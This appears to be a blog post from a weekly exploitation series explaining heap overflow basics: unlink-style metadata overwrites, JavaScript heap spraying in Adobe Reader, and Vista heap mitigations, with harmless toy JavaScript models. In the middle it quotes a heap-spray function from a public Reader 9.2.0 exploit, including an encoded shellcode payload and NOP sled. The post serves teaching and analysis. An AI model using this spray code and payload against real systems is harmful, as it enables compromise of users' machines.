0x41 - weekly exploitation matters - Heap overflow fundamentals
Stack buffer overflows are extinct
Exploiting stack buffer overflows on modern operating systems is harder these days, because many mitigations have to be overcome.
For example on Windows there's not only /GS - which Visual Studio enables by default nowadays - but also non-executable stack pages (DEP/NX), ASLR and what not. This pushes attackers toward return-oriented techniques, and I personally think that secure programming has improved with regard to stack buffer overflows as well. So they're rare and relatively cumbersome to exploit, because they're understood and mitigated.
In general, exploiting heap overflows isn't easier, but the heap offers a different set of vulnerabilities, and heap overflows are less well understood. How far the arms race between built-in mitigations and new attacks has progressed depends on the target. The low-hanging fruit are Mac OS X Leopard systems. Exploiting heap overflows on modern NT 6 (Vista/7) hosts can be seriously hard. Therefore I just analyzed a Windows XP SP3 exploit against Adobe Reader.
Metadata - Heap control structure overwrites
In a simplified view, the heap's blocks are kept in a doubly linked list: each block header carries two pointers, next and prev.
- // an oversimplified heap block header
- struct HeapBlockHeader
- {
-     HeapBlockHeader* next;
-     HeapBlockHeader* prev;
-     int size;
- };
A buffer overflow can overwrite parts of the heap structure. If the overflowing data is crafted carefully, it replaces the links within the heap structure, which alters the data flow, because the heap manager follows the pointers of the list elements.
The result is a write of an attacker-chosen value to an attacker-chosen address. Typically the return address on the stack gets overwritten with a pointer to code, which can for example lie within the data that was fed into the original entry point.
In the end it's simply about crafting the pattern that fits the attacked operating system: heap implementations differ.
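To make the unlink step concrete, here is a minimal sketch that models memory as a plain JavaScript Map. The addresses, the field offsets and the helper names (`read`, `write`, `makeBlock`, `unlink`) are assumptions for illustration only and don't match any real allocator's layout. It only shows why following corrupted links turns a list removal into a memory write.

```javascript
// Toy model: "memory" is a Map from address to value.
// Hypothetical header layout: next at offset 0, prev at offset 4.
const NEXT = 0, PREV = 4;
const mem = new Map();
const read = (addr) => (mem.has(addr) ? mem.get(addr) : 0);
const write = (addr, value) => mem.set(addr, value);

function makeBlock(addr, next, prev) {
  write(addr + NEXT, next);
  write(addr + PREV, prev);
}

// Unchecked removal: block.prev.next = block.next; block.next.prev = block.prev
function unlink(block) {
  const next = read(block + NEXT);
  const prev = read(block + PREV);
  write(prev + NEXT, next);
  write(next + PREV, prev);
}

// Three well-formed blocks: A <-> B <-> C
const A = 0x1000, B = 0x2000, C = 0x3000;
makeBlock(A, B, 0);
makeBlock(B, C, A);
makeBlock(C, 0, B);

// Simulate an overflow that replaces B's links with chosen values.
const TARGET = 0x7000; // stands in for a slot such as a saved return address
const VALUE = 0x5000;  // stands in for a pointer into controlled data
write(B + NEXT, VALUE);
write(B + PREV, TARGET - NEXT);

unlink(B);
console.log(read(TARGET).toString(16)); // 5000
```

Note the side effect: the second write of unlink() also stores TARGET at VALUE + 4, so in this toy model the location the value points to has to tolerate being written to.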
MacOS Leopard Heap
On a Mac OS X 10.5.x system the heap is - currently - executable. So it's not even necessary to perform a "return to libc" style attack. I recently read that Charlie found a couple of bugs in Preview.app and that he's going to give advice on vulnerability discovery techniques at CanSec.
Phrack 63 has an interesting paper on OS X's heap implementation, including overflow examples. My guess is that Charlie fuzzed Preview.app with a mutation-based approach, crashed it as often as possible, and then crafted a pattern to perform an unlink() based attack. Let's wait and see whether I'm correct, with patience and Feng Shui.
The structure of Leopard's heap is well described in "The Mac Hacker's Handbook" and in the Phrack 63 paper by Nemo.
Why heap-spray?
Adobe products regularly get exploited with heap-sprays, for example thanks to their JavaScript support. Everybody who creates malicious PDFs these days tries to predict the Reader's heap layout, and therefore tames it so that data ends up at a predictable position.
But that's not easy, because the heap depends on the runtime, and the runtime behavior of an application differs each time - even depending on which actions have been performed.
A heap-spray means, for example, that you use JavaScript to allocate large buffers and fill them with NOPs that slide into your shellcode. The more NOPs, the better: there's less data you do not control, and the large allocations help to defragment the heap.
There are some elegant variations of this heap-spray attack which are fun.
- var slide_size=0x100000;
- var size = 300;
- var x = new Array(size);
- var chunk = %%minichunk%%;
- while (chunk.length <= slide_size/2)
- chunk += chunk;
- for (i=0; i < size; i+=1) {
- id = ""+i;
- x[i]= chunk.substring(4,slide_size/2-id.length-20)+id;
- }
If you take a look at "Filling Adobe's Heap", for example, you'll realize that the JS code snippet above does exactly that: it allocates large chunks in order to position the data.
The JS code above constructs a memory chunk of roughly 0x100000 bytes by concatenating %%minichunk%% with itself again and again. It then copies that chunk 300 times, into 300 newly allocated strings.
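The sizes involved can be checked with a bit of bookkeeping. The sketch below allocates nothing; it only mirrors the loop bounds of the snippet. `sprayLayout` and `minichunkLength` are hypothetical names, the minichunk length of 4 is made up, and I assume the engine stores strings as UTF-16 with two bytes per character and ignore any per-string header overhead.

```javascript
// Size bookkeeping only: nothing is sprayed here.
// minichunkLength is a hypothetical stand-in for the length of %%minichunk%%.
function sprayLayout(minichunkLength, slideSize, count) {
  // Mirrors: while (chunk.length <= slide_size/2) chunk += chunk;
  let length = minichunkLength;
  let doublings = 0;
  while (length <= slideSize / 2) {
    length *= 2;
    doublings += 1;
  }
  // substring(4, slide_size/2 - id.length - 20) + id: id.length cancels out.
  const charsPerCopy = slideSize / 2 - 20 - 4;
  const bytesPerCopy = charsPerCopy * 2; // assumption: 2 bytes per character
  return {
    doublings,
    charsPerCopy,
    bytesPerCopy,
    totalBytes: bytesPerCopy * count,
  };
}

const layout = sprayLayout(4, 0x100000, 300);
console.log(layout.doublings);    // 18
console.log(layout.charsPerCopy); // 524264
console.log(layout.bytesPerCopy); // 1048528
console.log(layout.totalBytes);   // 314558400
```

So under these assumptions each copy is just below 0x100000 bytes, and the 300 copies add up to roughly 300 MB. The appended id makes every string unique, which presumably keeps the engine from sharing one buffer between the copies.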
On Windows each heap base lies at X + 0x1F0000 at most, so it varies by roughly 2 MB. The segment size is 16 MB. A large chunk (>= 512 KB) doesn't get ASLRed.
There's this rule of thumb "equation":
Last Page + (Spray amount / 2) = position of data.
Analysis of a Windows XP SP3 heap exploit
If you checked out exploit-db's SVN some time ago, you got a local Adobe Reader 9.2.0 PoC exploit (EDB-ID: 10618).
It's written in Python and contains functions that are useful if you want to trigger vulnerabilities in a JS-enabled Adobe Reader: for example UTF-16 conversion of the payload, raw PDF generation and JS embedding. The approach is clean and modular, so I added this exploit to my snippet repository.
Again we see a JS function that sprays the heap:
- << /Type /Action /S /JavaScript /JS (
- function spray_heap()
- {
- var chunk_size, payload, nopsled;
- chunk_size = 0x8000;
- payload = unescape("%uc931%ue983%ud9dd%ud9ee
- %u2474%u5bf4%u7381%u6f13%ub102%u830e%ufceb
- %uf4e2%uea93%u0ef5%u026
- f%u4b3a%u8953%u0bcd%u0317%u855e%u1a20%u513a%u034f%u475a
- %u36e4%u0f3a%u3381%u9771%u86c3%u7a71%uc368%u037b%uc06e%ufa5a
- %u5654
- %u0a95%ue71a%u513a%u034b%u685a%u0ee4%u85fa
- %u1e30%ue5b0%u1ee4%u0f3a%u8b84%u2aed%uc16b%uce80%u890b
- %u3ef1%uc2ea%u02c9%u42e4%
- u85bd%u1e1f%u851c%u0a07%u075a%u82e4%u0e01%u026f%u663a
- %u5d53%uf880%u540f%uf638%uc2ec%u5eca%u7c07%uec69%u6a1c
- %uf029%u0ce5%u
- f1e6%u6188%u62d0%u2c0c%u76d4%u020a%u0eb1");
- nopsled = unescape("%u0d0d%u0d0d");
- while (nopsled.length < chunk_size)
- nopsled += nopsled;
- nopsled_len = chunk_size - (payload.length + 20);
- nopsled = nopsled.substring(0, nopsled_len);
- heap_chunks = new Array();
- for (var i = 0 ; i < 1200 ; i++)
- heap_chunks[i] = nopsled + payload;
- }
The loop doubles nopsled until it is at least 0x8000 characters long. Then only the first nopsled_len characters are kept, so that sled plus payload fit into one chunk with 20 characters to spare. This trimmed nopsled is what ends up in heap_chunks[].
So again a huge data structure (1200 copies of nopsled + payload) gets generated to tame the heap with Feng Shui [1] and make it predictable.
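The trimming logic is easy to verify with harmless stand-ins. In this sketch "N" replaces the sled filler and a run of "P" replaces the payload; `buildChunk` and the payload length of 100 are assumptions of mine, not values taken from the exploit. It shows that every chunk ends up chunk_size - 20 characters long, no matter how long the payload is, and that the payload always sits at the very end.

```javascript
// Harmless stand-ins: filler and payload are plain letters.
function buildChunk(chunkSize, payload, filler) {
  let sled = filler;
  // Double the sled until it is at least chunkSize characters long.
  while (sled.length < chunkSize) sled += sled;
  // Trim it so that sled + payload is chunkSize - 20 characters in total.
  sled = sled.substring(0, chunkSize - (payload.length + 20));
  return sled + payload;
}

const fakePayload = "P".repeat(100); // hypothetical payload length
const chunk = buildChunk(0x8000, fakePayload, "NN");

console.log(chunk.length);              // 32748, i.e. 0x8000 - 20
console.log(chunk.endsWith(fakePayload)); // true
// Assuming 2 bytes per character, 1200 chunks take up:
console.log(chunk.length * 2 * 1200);   // 78595200
```

That's about 75 MB of sprayed data, considerably less than the roughly 300 MB of the first snippet.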
The rest of the exploit is bug triggering. That will differ for each bug you may want to go after.
References
[1] Heap Feng Shui in JavaScript - Alexander Sotirov - BH Europe 2007
What's with the Vista Heap?
The attacks mentioned so far - the heap-spray and the referenced unlink() attack - are relatively outdated. They're not primitive, but not as application specific as they need to be on newer systems. There are some newer techniques [3] against the new mitigations, the most notable of which are [2]:
- LFH and regular heap block randomization
- "Block CRC" checksum as part of the HEAP_ENTRY - each chunk from the standard heap has an 8-byte header in front of the returned pointer, consisting of size, flags, checksum and so on
- the HeapEnableTerminationOnCorruption information class of the HeapSetInformation API - optional termination in case of inconsistencies due to corruption
- "on demand" low fragmentation heap, which changes the allocation pattern
- list integrity checks - so no list removal based attacks
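The list integrity check from the last bullet can be sketched on a toy memory model. Everything here (the Map based memory, the offsets, `safeUnlink`) is an illustrative assumption and not the actual Vista implementation. The idea is only that a block may be removed if both neighbours still point back at it.

```javascript
// Toy memory model; addresses and offsets are illustrative assumptions.
const OFF_NEXT = 0, OFF_PREV = 4;
const cells = new Map();
const load = (addr) => (cells.has(addr) ? cells.get(addr) : 0);
const store = (addr, value) => cells.set(addr, value);

function link(addr, next, prev) {
  store(addr + OFF_NEXT, next);
  store(addr + OFF_PREV, prev);
}

// Removal that first verifies both neighbours still point back at the block.
function safeUnlink(block) {
  const next = load(block + OFF_NEXT);
  const prev = load(block + OFF_PREV);
  if (load(next + OFF_PREV) !== block || load(prev + OFF_NEXT) !== block) {
    throw new Error("list corruption detected");
  }
  store(prev + OFF_NEXT, next);
  store(next + OFF_PREV, prev);
}

// Circular list with a sentinel: HEAD <-> X <-> Y <-> HEAD
const HEAD = 0x100, X = 0x200, Y = 0x300;
link(HEAD, X, Y);
link(X, Y, HEAD);
link(Y, HEAD, X);

safeUnlink(X); // well-formed links: removal succeeds

// Simulate an overflow that replaces Y's links with chosen values.
const SLOT = 0x700;
store(Y + OFF_NEXT, 0x500);
store(Y + OFF_PREV, SLOT);

let rejected = false;
try {
  safeUnlink(Y);
} catch (e) {
  rejected = true;
}
console.log(rejected, load(SLOT)); // true 0
```

The corrupted removal is refused before anything is written, so SLOT stays untouched. What the real heap manager does on a failed check (for example terminating the process) is not modeled here.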
If you attach WinDbg to your target application, you can retrieve the metadata with !heap -i heap_handle.
An application specific attack overwrites structures on the heap that are important to the application, in order to manipulate its behavior. Therefore it requires control over the target application's allocation pattern.
I managed to get something like that recently: a large chunk allocation via RtlAllocateHeap() (and therefore not ASLRed). But I'll save the heap overflow specifics and guard pages for a follow-up write-up in two weeks or later, and until then I'll try to find an exploitable target application to demonstrate it properly.
I think it's challenging.
References
[2] Windows Vista heap management enhancements - Adrian Marinescu (MS) - BH 2006
[3] Attacking the Vista Heap - Ben Hawkes - Ruxcon 2008
Summary
- just Feng Shui and heap-spray - fundamentals for heap overflows
- inspiration to go after application specific heap exploitation techniques
- not too much blabla
What's up next week: Windows shellcode
Normally you take shellcode for granted?
- That's okay, everybody does that. But how do you validate shellcode within exploits? It may be a fake exploit that deletes your local files. Worse things have been seen.
Next week: shellcode analysis and reversing, shellcode basics, shellcode frameworks, Windows shellcode.
Feedback
Mail to wishi - at - sandokai.eu.
Have fun,
wishi
